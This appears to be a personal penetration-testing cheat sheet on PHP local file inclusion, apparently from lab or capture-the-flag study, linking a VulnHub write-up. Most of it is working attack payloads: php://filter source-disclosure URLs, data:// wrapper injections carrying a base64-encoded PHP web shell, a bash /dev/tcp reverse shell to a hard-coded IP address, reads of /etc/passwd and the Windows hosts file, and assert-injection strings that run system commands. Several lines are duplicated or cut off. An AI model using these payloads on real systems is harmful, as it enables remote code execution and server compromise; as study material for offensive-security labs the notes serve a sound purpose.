File inclusion Vuln
Checking LFI on Windows server
instead of /etc/passwd use C:/Windows/System32/drivers/etc/hosts
PHP Wrappers
PHP provides several protocol wrappers1 that we can use to exploit directory traversal and
local file inclusion vulnerabilities. These filters give us additional flexibility when attempting to inject PHP code via LFI vulnerabilities.We can use the data2 wrapper to embed inline data as part of the URL with plaintext or base643 encoded data. This wrapper provides us with an alternative payload when we cannot poison a local file with PHP code.
- filter to check source code of executable files
- http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-
encode/resource=<file>- http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-
encode/resource=admin.php- then decode the output via echo “ “ | base64 -d
- http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-
- http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-
- data:
- <http://<vul-web>/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
- if there any restriction then it can be bypass by encoding
- echo -n '<?php echo system($_GET["cmd"]);?>' | base64
- PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==
- http://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZW
NobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls"
- echo -n '<?php echo system($_GET["cmd"]);?>' | base64
- Reverse shell
http://<ip>/section.php?page=data:text/plain,<?php echo shell_exec('bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.221%2F443%200%3E%261');?>
- filter to check source code of executable files
LFI through alternate way
if ../../../etc/passwd don’t work then
- ' and die(show_source('/etc/passwd')) or ‘
- for command use shell
- ' and die(system("<command>")) or ‘
https://h0j3n.medium.com/vulnhub-assertion-1-0-1-eb78a0cb9216